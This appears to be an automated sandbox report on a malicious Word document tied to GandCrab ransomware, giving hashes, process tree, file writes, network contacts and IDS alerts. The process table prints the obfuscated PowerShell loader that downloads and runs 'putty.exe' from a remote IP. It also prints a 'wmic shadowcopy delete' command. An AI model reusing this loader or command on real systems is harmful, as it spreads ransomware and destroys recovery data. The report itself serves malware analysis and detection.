File name: | Emergеnсyеxitmар.doc |
Full analysis: | https://app.any.run/tasks/c68fcb5a-56a4-4be0-95d4-d430a7c253a0 |
Verdict: | Malicious activity |
Threats: | GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost. |
Analysis date: | January 23, 2019, 08:08:54 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: admin, Template: Normal.dotm, Last Saved By: Admin, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Tue Jan 22 18:58:00 2019, Last Saved Time/Date: Tue Jan 22 18:59:00 2019, Number of Pages: 1, Number of Words: 9, Number of Characters: 57, Security: 0 |
MD5: | 2D25220BFD3BC6CABF1CA27D5F41A362 |
SHA1: | A0812FDAF898AAC0184C7FA08F7F11BAE29C3750 |
SHA256: | 6D20FCE7FF12863EE648EFF76A6E77E67BD78FB93FD137456CEB134DE4B30BE1 |
SSDEEP: | 384:JtBYFiSAoKXMVkZ02s3pLcHYt68jkHI1oSY7Y2W0dSVSrvFigztPASt0jjlmSrqR:jMVk2HpMJ8kHSY7YgdSVSrvgQd |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | admin |
Keywords: | - |
Template: | Normal.dotm |
LastModifiedBy: | Admin |
RevisionNumber: | 4 |
Software: | Microsoft Office Word |
TotalEditTime: | 1.0 minutes |
CreateDate: | 2019:01:22 18:58:00 |
ModifyDate: | 2019:01:22 18:59:00 |
Pages: | 1 |
Words: | 9 |
Characters: | 57 |
Security: | None |
CodePage: | Windows Cyrillic |
Company: | Salve |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 65 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | ???????? Microsoft Word 97-2003 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2964 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Emergеnсyеxitmар.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3948 | powershell $AbR41ULTo = '65532.804050533$xJw0xyfhi = 65532.804050533n65532.804050533e65532.804050533w65532.804050533-obj65532.804050533e65532.804050533c65532.804050533t n65532.804050533e65532.804050533t65532.804050533.w65532.804050533e65532.804050533b65532.804050533cli65532.804050533ent; $xJw0xyfhi.d65532.804050533o65532.804050533w65532.804050533n65532.804050533l65532.804050533o65532.804050533a65532.804050533d65532.804050533f65532.804050533i65532.804050533le(\"65532.804050533h65532.804050533t65532.804050533t65532.804050533p65532.804050533://205.185.117.187/olalala/putty.exe\", \"c:\win65532.804050533dows\t65532.804050533emp\put65532.804050533t65532.804050533y65532.804050533.65532.804050533e65532.804050533x65532.804050533e\"); 65532.804050533s65532.804050533tar65532.804050533t-p65532.804050533r65532.804050533o65532.804050533ces65532.804050533s \"c:\win65532.804050533d65532.804050533o65532.804050533ws\temp\p65532.804050533u65532.804050533t65532.804050533t65532.804050533y.ex65532.804050533e\";'.replace('65532.804050533', $OPQJjrhbU);$uDzjkYGah = '';iex($AbR41ULTo); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3256 | "C:\windows\temp\putty.exe" | C:\windows\temp\putty.exe | powershell.exe | |
User: admin Company: Nullsoft, Inc. Integrity Level: MEDIUM Description: Audience Need Zimmerman Version: 3.1.22.6 | ||||
3104 | "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete | C:\Windows\system32\wbem\wmic.exe | putty.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: WMI Commandline Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3248 | C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | — | services.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Volume Shadow Copy Service Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2964 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREA64.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3948 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SVAQ3MCXXMHK4O1TQ5D3.temp | — | |
MD5:— | SHA256:— | |||
3256 | putty.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi | — | |
MD5:— | SHA256:— | |||
3256 | putty.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim | — | |
MD5:— | SHA256:— | |||
3256 | putty.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim.wfpnwtgw | — | |
MD5:— | SHA256:— | |||
3948 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2964 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:633EDCAF70A08EA4C8F9489679EF5BF4 | SHA256:446A4274C3E9935A40A0EA6332996E3ABECA0B7D59EB8A541F56397F29158E6E | |||
3256 | putty.exe | C:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-500\WFPNWTGW-DECRYPT.txt | text | |
MD5:FE747A5E31BE420CF1211EE1CAD10730 | SHA256:2A7C25BAC5E5F054EBCEB6E9E8BB71606E3AEF4DAD4F282F4820CB138E2D219C | |||
3256 | putty.exe | C:\PerfLogs\WFPNWTGW-DECRYPT.txt | text | |
MD5:FE747A5E31BE420CF1211EE1CAD10730 | SHA256:2A7C25BAC5E5F054EBCEB6E9E8BB71606E3AEF4DAD4F282F4820CB138E2D219C | |||
3948 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f3ab.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3948 | powershell.exe | GET | 200 | 205.185.117.187:80 | http://205.185.117.187/olalala/putty.exe | US | executable | 641 Kb | suspicious |
3256 | putty.exe | GET | 301 | 138.201.162.99:80 | http://www.kakaocorp.link/ | DE | html | 162 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3256 | putty.exe | 138.201.162.99:443 | www.kakaocorp.link | Hetzner Online GmbH | DE | malicious |
3256 | putty.exe | 138.201.162.99:80 | www.kakaocorp.link | Hetzner Online GmbH | DE | malicious |
3948 | powershell.exe | 205.185.117.187:80 | — | FranTech Solutions | US | suspicious |
Domain | IP | Reputation |
---|---|---|
www.kakaocorp.link |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3948 | powershell.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
3948 | powershell.exe | Potentially Bad Traffic | ET INFO Possibly Suspicious Request for Putty.exe from Non-Standard Download Location |
3948 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3948 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3948 | powershell.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |